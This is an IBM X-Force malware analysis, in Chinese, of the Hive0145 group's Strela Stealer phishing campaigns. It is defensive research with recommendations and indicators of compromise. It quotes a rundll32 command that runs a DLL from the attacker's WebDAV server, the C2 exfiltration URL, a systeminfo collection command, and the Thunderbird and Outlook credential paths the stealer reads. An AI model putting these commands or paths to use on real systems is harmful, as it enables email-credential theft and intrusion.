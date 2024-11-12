安全

Strela 窃密木马：今日发票即明日钓鱼

发布日期 2024年11月12日
警惕电子邮件收件箱和垃圾邮件病毒，注意防范。

作者

Golo Mühr

Malware Reverse Engineer

IBM

Joe Fasulo

Cyber Threat Researcher - IBM X-Force

Charlotte Hammond

Malware Reverse Engineer

IBM Security

截至 2024 年 11 月，IBM X-Force 追踪到 Hive0145 持续向欧洲各地（主要为西班牙、德国和乌克兰）的受害者传播 Strela 窃密木马恶意软件。这些活动中使用的网络钓鱼电子邮件是通过此前泄露的电子邮件凭据窃取而来的真实发票通知。Strela 窃密木马专门设计用于窃取 Microsoft Outlook 和 Mozilla Thunderbird 中存储的用户凭据。过去 18 个月里，该组织测试了多种技术手段以提升攻击效率。Hive0145 很可能是一个以经济利益为动机的初始访问代理组织 (IAB)，自 2022 年底开始活跃，可能是 Strela 窃密木马的唯一运营者。Hive0145 持续的攻击活动表明，欧洲潜在受害者面临的风险正持续攀升。

主要结论：

  • Hive0145 是一个初始访问代理组织，专注于在欧洲各地寻找受害者
  • 过去 18 个月里，Strela 窃密木马测试了多种技术手段以优化其感染链并窃取电子邮件凭据
  • 2024 年 7 月，Hive0145 开始使用窃取的电子邮件进一步传播 Strela 窃密木马
  • Hive0145 的攻击活动呈增长态势，自 2024 年 10 月 17 日起已形成每周攻击模式
  • 2024 年 11 月初，Hive0145 开始利用窃取的发票电子邮件攻击乌克兰受害者
  • Hive0145 可能是 Strela 窃密木马的唯一运营者

行业时事通讯

辅以专家洞察分析的最新科技新闻

通过 Think 时事通讯，了解有关 AI、自动化、数据等方面最重要且最有趣的行业趋势。请参阅 IBM 隐私声明

谢谢！您已订阅。

您的订阅将以英语提供。每份时事通讯都包含取消订阅链接。您可以在此管理您的订阅或取消订阅。更多相关信息，请参阅我们的 IBM 隐私声明

背景

自 2023 年 4 月中旬起，X-Force 开始追踪到 Hive0145 活动频率呈上升态势。Hive0145 很可能是一个以经济利益为动机的初始访问代理组织 (IAB)，并且可能是 Strela 窃密木马的唯一运营者。Strela 窃密木马是一种恶意软件，专门窃取存储在 Microsoft Outlook 和 Mozilla Thunder Bird 中的用户电子邮件凭据，可能导致商业电子邮件泄露 (BEC) 事件。IAB 通常收集凭据和其他数据，然后出售给专门入侵受害者网络的关联威胁参与者。但目前尚不清楚 Hive0145 是否有特定的合作网络负责出售其通过攻击活动窃取的访问权限。

过去一年中，Hive0145 展现出高超的计策、技术与程序 (TTP) 演进能力，持续针对欧洲受害者展开攻击。意大利、西班牙、德国和乌克兰的受害者持续收到带有恶意附件的邮件，诱使受害者打开文件。攻击者会向受害者发送伪造的发票或收据，通常还会附上简短的通用紧急提示信息，催促受害者尽快处理。加载附件后，受害者就会在不知不觉中执行感染链，导致 Strela 窃密木马恶意软件入侵。

展示如何分析和避免恶意软件的电脑屏幕截图

图 1：以桑坦德银行为主题的电子邮件攻击活动

Hive0145 在 2024 年上半年持续采用通用信息及伪造发票收据的攻击模式。但到 2024 年 7 月初，该组织转变策略，开始利用金融、科技、制造、媒体、电商等行业真实实体的被盗电子邮件实施攻击。这种从简单手段转向更复杂手法的转变，标志着 Hive0145 网络攻击能力的成熟化演进。

附件劫持

2024 年 7 月，X-Force 观察到 Hive0145 在攻击活动中对其散布的电子邮件进行了调整，简短的通用消息被替换成看似合法的被盗电子邮件。这些网络钓鱼电子邮件与官方发票通知邮件完全一致，部分案例中甚至直接使用了原始收件人姓名。X-Force 确认这些电子邮件确系金融、科技、制造、媒体、电商等行业多家实体发出的真实发票通知。该组织很可能通过先前行动窃取的凭证获取了这些电子邮件。

利用被盗邮件并非新手法，Emotet 组织以及 Hive0118（又名 TA577）、TA551TA570 等恶意软件传播者曾广泛使用此手法。他们在攻击活动中利用了邮件线程劫持技术——通过在被盗电子邮件中创建新线程来增强邮件的可信度。篡改后的电子邮件被发送给先前受害者的对应联系人，使最终邮件看似是对被盗邮件的回复，从而劫持电子邮件线程。传播者添加的邮件内容通常是简短回复，催促受害者查看邮件中的附件或网址。

Hive0145 采用的手段与邮件线程劫持技术有所不同，他们不在被盗电子邮件中添加回复消息，而是基本保留原始邮件内容不变，仅将附件替换为使用原始文件名（但不带原始扩展名）的恶意载荷。Hive0145 还会在邮件正文中将原始发件人的本地部分和域名替换为新钓鱼受害者的对应信息，从而实现邮件的定制化处理。这些带有劫持附件的邮件随后会在大规模网络钓鱼攻击活动中被发送出去。Hive0145 似乎还仔细筛选了被劫持的电子邮件，只选择涉及发票且带有附件的电子邮件。X-Force 自 2024 年中期起就观察到针对德语、西班牙语和乌克兰语使用者的攻击活动中出现了附件劫持技术。

展示如何分析和避免恶意软件的电脑屏幕截图

图 2：带有被劫持附件的德国铁路发票原始被盗电子邮件示例

2024 年末攻击活动

从 2024 年 7 月的攻击活动在 7 月 8 日这周开始出现邮件发送量较低的迹象。Hive0145 似乎进行了短暂休整，然后在 7 月 22 日这周再次发起了更大规模的攻击，随后又进入了沉寂期。从 2024 年 10 月中旬开始，Hive0145 卷土重来，开展了一场针对西班牙、德国和乌克兰受害者的大范围附件劫持活动。与 7 月的短暂攻击不同，这场攻击持续发送大量邮件，且主要集中在工作日发送。

恶意软件攻击增长态势图表

图 3：2024 年 10 月下旬持续进行的攻击活动

截至 2024 年 11 月初，金融、科技、制造、媒体、电商等行业的被盗电子邮件仍在被恶意利用，这是迄今为止观察到的规模最大的 Hive0145 攻击活动之一。在持续进行的攻击活动中，受害者会收到一个内含高度混淆 JavaScript 文件的压缩包，该文件会下载并执行加密的 Strela 窃密木马 DLL。2024 年 11 月 7 日，Hive0145 将乌克兰语使用者纳入攻击范围，这标志着其攻击目标范围较以往观察到的受害者画像出现显著扩大。

展示如何分析和避免恶意软件的电脑屏幕截图

图 4：攻击乌克兰受害者的原始被盗发票电子邮件示例

Hive0145 通过附件劫持技术大幅提升攻击邮件发送量，并持续获取新窃取的邮件作为攻击素材，这表明该组织可能已采用自动化流程来窃取、恶意利用、打包并发送钓鱼邮件。在整个欧洲范围内，该组织持续表现出对西班牙、德国和乌克兰受害者的广泛攻击偏好。

不断演进的手段

Hive0145 之所以在众多恶意软件传播者中尤为突出，是因为他们不断采用日益复杂的方法来传播 Strela 窃密木马。这种复杂程度堪比 Emotet、Pikabot 和 Qakbot 等成功的大规模恶意软件传播者，后者往往最终部署勒索软件。下文梳理了 Hive0145 在不同时期使用的重要技术，其中部分技术曾短暂测试过，另一些则被全面采用。

多语言技术

X-Force 观察到的首批 Strela 窃密木马攻击活动使用了多语言文件，该技术最早由 DCSO（德国网络安全组织）于 2022 年底在博客中披露。这类文件具有多种有效格式，可被不同应用程序解析。同一文件既能以 HTML 格式展示发票诱饵，又能作为有效的 DLL 文件执行 Strela 窃密木马。这种试图绕过安全解决方案的技术手段较为罕见。

经签署的二进制文件

整个 2023 年期间有多个攻击活动利用有效的代码签名证书为恶意 Strela 窃密木马二进制文件提供掩护。例如，早在 2023 年 4 月针对西班牙语受害者的攻击活动中，有效载荷就使用了由巴西软件公司 Tecfinance Informatica E Projetos De Sistemas Ltda 签署的有效证书。

展示如何分析和避免恶意软件的电脑屏幕截图

图 5：2023 年攻击活动中使用的巴西公司证书

2024 年 5 月 5 日，X-Force 将这一结论告知相关方，该证书随后被吊销。

值得注意的是，2023 年中期针对意大利受害者的攻击活动使用了另一份证书：

签名验证和证书的屏幕截图

图 6：2023 年中期用于攻击意大利受害者的另一份被盗证书

定向网络钓鱼

Strela 窃密木马网络钓鱼活动还会定制文件名，使其包含目标域名。可能是为了营造真实感，这些文件名通常与组织或企业的名称完全一致。以下列举了一封 2023 年伪装成发票或付款收据的钓鱼邮件。

展示如何分析和避免恶意软件的电脑屏幕截图

图 7：以 Factura 为主题的电子邮件攻击活动

正如电子邮件所示，附件是加密的 ZIP 文件，每封邮件的密码略有不同。威胁参与者之所以对电子邮件附件进行加密，是因为基本的邮件过滤和沙盒解决方案通常无法检查或触发这些文件。

Strela 窃密木马还对其 PE 可执行文件使用了不常见的扩展名，例如使用 .com 替代 .exe

transferencia_<domain_name>.com
factura_<domain_name>.com
FATTURA_<domain_name>.bat.exe

 

此举利用了 Microsoft Windows 操作系统的一个规则——有三种扩展名可将文件标记为可执行格式：.exe、.com、.pif。

如果邮件内容是可执行 PE 文件，Microsoft Windows 会在文件打开时自动运行它。使用不常见和鲜为人知的扩展名后，攻击活动可能会躲过简单的反病毒解决方案或降低受害者的警觉性。此前使用相同有效载荷的攻击活动也曾被观察到使用了 .pif 扩展名。

打包、混淆与加密

除了直接附加包含恶意可执行文件的 ZIP 压缩包外，Strela 窃密木马攻击活动还经常使用 Batch、JavaScript 或 PowerShell 等混淆脚本来下载或投放有效载荷。

2024 年全年的攻击活动主要依靠这些混淆脚本来运行 PowerShell 命令，以连接 WebDAV 服务器下载并运行加密 DLL 文件：

"C:\Windows\system32\rundll32.exe"
\\94.159.113.48@8888\davwwwroot\157161090119030.dll,Entry

 

WebDAV 阶段服务器托管着大量名称和哈希值各异的 DLL 文件。它们似乎是使用 X-Force 标识为“Stellar Crypter”的加密器构建的，该加密器可能至少自 2023 年 5 月起就一直由 Hive0145 专门使用。标识为“Stellar 加载器”的恶意二进制文件内含加密的 Strela 窃密木马有效载荷。

Stellar 加载器

Stellar 加载器是一款至少从 2023 年 4 月开始使用的加密器，主要作为后续 Strela 窃取木马有效载荷的前置部署工具。Stellar 样本通常经过高度混淆，采用控制流混淆等技术手段，并包含大量垃圾指令以阻碍分析和特征码生成。Stellar 有效载荷经过异或加密，存储在 Stellar 加载器二进制文件的.data 节区中。加密的有效载荷数据前缀为异或密钥，近期样本中该密钥仅由大小写字母组成，长度可达数千字符。

执行时，Stellar 加载器使用异或运算和存储的密钥解密有效载荷数据。解密过程中可能还会使用硬编码单字节密钥额外进行一轮异或运算。作为 Stellar 加载器代码混淆策略的一部分，代码中的解密算法常被扩展至包含数百个操作。然而，绝大多数操作会相互抵消，看似复杂的算法其实可简化为单次异或运算。下方屏幕截图所示为混淆程度最低的 Stellar 加载器版本，其中加载器代码结构和解密算法清晰可见。

屏幕截图所示为混淆程度最低的 Stellar 加载器版本，其中加载器代码结构和解密算法清晰可见。

在加载器的最新版本中，加密的有效载荷数据后缀为附加的加密区块，内含加载器代码所需的 API 名称列表，例如 VirtualAlloc。加载器使用与有效载荷相同的密钥对该区块进行解密，但省略了额外的单字节异或运算。随后加载器可以使用该区块中的 API 名称来检索相应的 API 地址。

十六进制编辑器视图，左侧显示十六进制值，右侧显示相应的解码文本。

有效载荷和 API 列表完成解密后，Stellar 会通过 VirtualAlloc 分配内存空间，将有效载荷 PE 映射到分配地址，然后执行标准的 PE 加载步骤，例如加载其导入项和处理重定位节区 (.relocs)，最后在入口点地址执行有效载荷。

Strela 窃密木马

过去两年间，Strela 窃密木马在功能上几乎没有变化。自 2022 年底 DCSO 披露的初始版本起，该窃密木马的主要目标始终是从两个常见的电子邮件客户端（Microsoft Outlook 和 Thunderbird）中窃取电子邮件凭据。所有版本均目标一致，但最新版本相比老版本支持搜索更多注册表项以获取 Microsoft Outlook 凭据。

Strela 窃密木马运行两个功能模块，分别负责从两个电子邮件客户端窃取凭据：

电子邮件客户端

Thunder Bird

Microsoft Outlook

地点

文件系统

注册表

路径

%APPDATA%
\Thunderbird
\Profiles
\logins.
json

%APPDATA%
\Thunderbird
\Profiles
\key4.
db

SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\
 9375CFF0413111d3B88A00104B2A6676\\

SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\
9375CFF0413111d3B88A00104B2A6676\\

Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676

Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows MessagingSubsystem\\Profiles\\Outlook\\
9375CFF0413111d3B88A00104B2A6676

对于 Outlook，Strela 窃密木马专门查找以下注册表值：

  • IMAP 服务器
  • IMAP 用户
  • IMAP 密码 – 使用 CryptUnprotectData() 解密

数据经过格式化处理后，添加前缀字符串“FF”（Thunderbird 数据）或“OL”（Outlook 数据）。接下来，数据还会使用静态异或密钥进行加密，该密钥代表一个 GUID 字符串，例如：

96be98b2-8a00-410d-87da-2482cc8b7793  

随后 Strela 窃密木马会针对每个电子邮件客户端向其硬编码的 C2 服务器发送 POST 请求：

http://94.159.113[.]48/server.php

响应数据通过上述相同的异或密钥进行解密。Strela 窃密木马会每隔 1 秒持续发送 POST 请求，直到请求失败或收到字符串“KH”（2023 版本）、“ANTIROK”（2024 版本）或“CHOLLIMA”（2024 年 11 月版本）。

2024 年 10 月，Strela 窃密木马还新增了两个数据窃取功能。第一个窃取功能通过以下命令收集主机的系统信息并将其写入文件：

cmd.exe /c systeminfo > %TMP%\{<volume_guid_of_system_folder>}s.txt

第二个窃取功能利用 COM 对象来枚举受害者电脑“AppsFolder”（虚拟文件夹，显示为“应用程序”）中的已安装应用程序列表。

显示代码的屏幕截图

被窃取的文件以及已安装应用程序列表在窃取前会像其他文件一样被读取和加密，随后分别以标识符“SI”和“LA”发送至 C2 服务器。

语言检查

Strela 窃密木马开始实施语言检查，核实受害者主机的键盘语言。2024 年期间的所有版本仅在采用以下键盘语言之一的主机上运行：

  • 西班牙语
  • 德语
  • 加泰罗尼亚语
  • 波兰语
  • 意大利语
  • 巴斯克语
代码屏幕截图

11 月初，Hive0145 也开始传播乌克兰语被盗电子邮件，并略微修改了语言验证逻辑，将乌克兰语 (0x422) 加入键盘布局列表。此外，开发人员还改用 GetKeyboardLayoutList API 以覆盖所有已安装的键盘布局。如果没有一种语言匹配，Strela 窃密木马会进行二次检查，将 Get LocaleInfoA 获取的用户默认区域设置结果与“AU”和“UA”（分别为澳大利亚和乌克兰的代码）进行比对。开发人员可能并不确定返回值的字节序，故未将澳大利亚纳入目标范围。总体而言，这些更改扩大了 Strela 窃密木马可感染机器的范围。

展示如何分析和避免恶意软件的电脑屏幕截图

以前，该恶意软件会在运行后向用户显示一条不显眼的错误消息，以免引起怀疑。该消息会根据所安装的键盘语言显示文件已损坏且无法打开。最新版本使用的是更通用的错误消息“Err 100”，该消息会在程序执行开始 5 秒后出现。

.NET 变体

2023 年 6 月，X-Force 观察到一场以意大利受害者为目标的 Hive0145 攻击活动传播了一种完全使用 .NET 重写的 Strela 窃密木马新变体。与以前的攻击活动类似，该版本也使用了有效的代码签名证书。威胁参与者使用不同语言重新实现恶意软件的举动表明其投入了大量精力。为了隐藏字符串、函数名和控制流，开发人员使用了商业版的 .NET 混淆工具“Aldaray Rummage Obfuscator”。下方屏幕截图所示为用于访问 Microsoft Outlook 注册表项中 IMAP 凭据并解除其保护措施的代码。

屏幕截图所示为用于访问 Microsoft Outlook 注册表项中 IMAP 凭据并解除其保护措施的代码。

值得注意的是，商业版混淆器包含许可证水印，其显示如下：

Rummage is licensed to Victoria Semigodova (issue J) for use with any product.
5687c5da50660eda

上面的示例显示以下意大利语错误信息：

Il file viene arrestato e non può essere eseguito.

Hive0145 目标

Hive0145 专注于窃取电子邮件凭据，这使得该组织有别于其他窃密木马或僵尸网络恶意软件的运营者，后者通常采用商品化模式，目标涵盖更广泛的凭据和数据，或为旨在获取初始访问权限的后续有效载荷提供便利。Hive0145 使用被盗电子邮件进行附件劫持的行为表明，部分被盗电子邮件凭据可用来窃取合法电子邮件以扩大传播范围。Hive0145 使用的被盗邮件和伪造邮件主要以发票为主题，这表明其可能存在经济动机。Hive0145 可能会将窃取的电子邮件出售给关联合作伙伴，进一步造成商业电子邮件泄露。

Mixture of Experts | 12 月 12 日，第 85 集

解码 AI：每周新闻摘要

加入我们世界级的专家小组——工程师、研究人员、产品负责人等将为您甄别 AI 领域的真知灼见，带来最新的 AI 资讯与深度解析。
观看 Mixture of Experts 所有剧集

结论：

Hive0145 是一个迅速发展的网络犯罪威胁参与者，其目标是感染受害者以获取有效的电子邮件凭据。观察表明，通过初始攻击活动窃取电子邮件凭据后，该组织进一步利用这些凭据窃取有效的电子邮件来实施后续的附件劫持活动。Stela 窃密木马恶意软件仍然是 Hive0145 窃取电子邮件凭据的有效工具。

Hive0145 的电子邮件攻击活动模拟的行业范围广泛，使整个欧洲的商业组织面临更高的潜在攻击风险。值得注意的是，意大利语、西班牙语、德语或乌克兰语地区的组织可能面临更直接的 Hive0145 攻击风险。X-Force 建议各组织对收到的电子邮件附件提高警惕，仔细核对所接收文件的预期类型。

建议：

X-Force 建议各组织：

  • 谨慎处理电子邮件和 ZIP 压缩包附件
  • 考虑将 Javascript/JScript/VBScript 文件的默认打开程序更改为记事本
  • 监控执行远程托管 DLL 的 runll32.exe 进程
  • 安装和配置端点安全软件
  • 更新相关的网络安全监控规则
  • 培训员工了解组织面临的潜在威胁
滚动查看完整表格

指示符

指标类型

情境化

03853c56bcfdf87d71ba
4e17c4f6b55f989edb29fc1
db2c82de3d50be99d7311

SHA256

Stellar 加载器（2024 年 10 月）

e50bea80513116a1988822
fe02538d3af4d91505d409
8afca4ea741bcf4cd427

SHA256

Stellar 加载器（2024 年 5 月）

2cac42735170cd3f67111807
a7e48f8fca104eb97c379129
872249160d90e22d

SHA256

Stellar 加载器 - 混淆程度最低（2024 年 1 月）

9a032497b82c3db8146cb6
24b369f63bef76b302a5e25
349156bdcb53af3fb84

SHA256

Strela 窃密木马有效载荷

e4a7ad38aaea4bd27c32c57
b5a52eac1020495cf8698a2b
595b169a3c5c9313a

SHA256

Strela 窃密木马有效载荷

2f7ac330e100b577748bb34
bd8f7f655f6d138b90683594
dbf06ccc41bb3751a

SHA256

Stellar 加载器（2024 年 11 月）

94.159.113[.]48

IPv4

Strela 窃密木马 C2

94.159.113[.]86

IPv4

Strela 窃密木马 C2

193.109.85[.]231

IPv4

Strela 窃密木马 C2

5906c8e683b8eb9d2bc104f
3ca7abaa1f76c64ac694c46a
0de5ec67456364f5d

SHA256

Strela 窃密木马 .NET 变体